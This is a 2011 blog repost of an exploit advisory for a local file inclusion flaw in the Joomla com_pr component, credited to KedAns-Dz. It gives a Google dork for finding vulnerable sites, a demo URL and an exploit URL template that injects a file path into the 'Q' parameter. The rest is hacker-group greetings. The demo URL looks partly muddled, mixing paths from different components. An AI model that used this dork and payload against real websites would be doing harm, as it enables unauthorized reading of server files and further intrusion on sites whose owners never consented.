Rabu, 09 Maret 2011

Joomla PR Local File Inclusion 

# Title : Joomla Component (com_pr) Local File Inclusion Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Local File Inclusion
# Tested on : Windows XP sp3 FR

# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )

# Go0gle Dork : inurl:com_pr


Demo:

http://[Target]/[Path]/index.php?Q=/vwar/joomla/components/com_extcalendar//index.php?option=com_pr

Explo!t : 

http://[Target]/[Path]/index.php?Q=[LFI]

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
#  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#==========================================================================
Diposting oleh dedexcaem di 21.16
Label:
 
blogger templates